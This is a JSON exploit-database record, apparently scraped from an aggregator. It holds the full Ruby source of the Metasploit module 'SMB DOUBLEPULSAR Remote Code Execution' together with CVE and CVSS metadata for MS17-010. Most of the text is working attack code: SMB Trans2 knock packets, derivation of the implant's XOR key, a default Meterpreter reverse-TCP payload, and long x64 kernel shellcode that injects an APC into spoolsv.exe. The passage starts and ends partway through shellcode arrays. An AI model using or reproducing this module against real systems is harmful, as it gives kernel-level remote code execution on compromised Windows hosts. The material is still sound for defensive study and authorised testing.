\"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-29] #"}, "lastseen": "2021-10-28T22:16:57", "differentElements": ["sourceData"], "edition": 58}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "90f0fe2a63f7d9bf4699ef0688f82d67", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0146"], "immutableFields": [], "lastseen": "2021-10-29T22:19:20", "history": [], "viewCount": 112, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM", "700099.PRM"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96709", "SMNTC-96707", "SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96705"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0143", "MS:CVE-2017-0144", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-29T22:19:20", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-10-29T22:19:20", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n 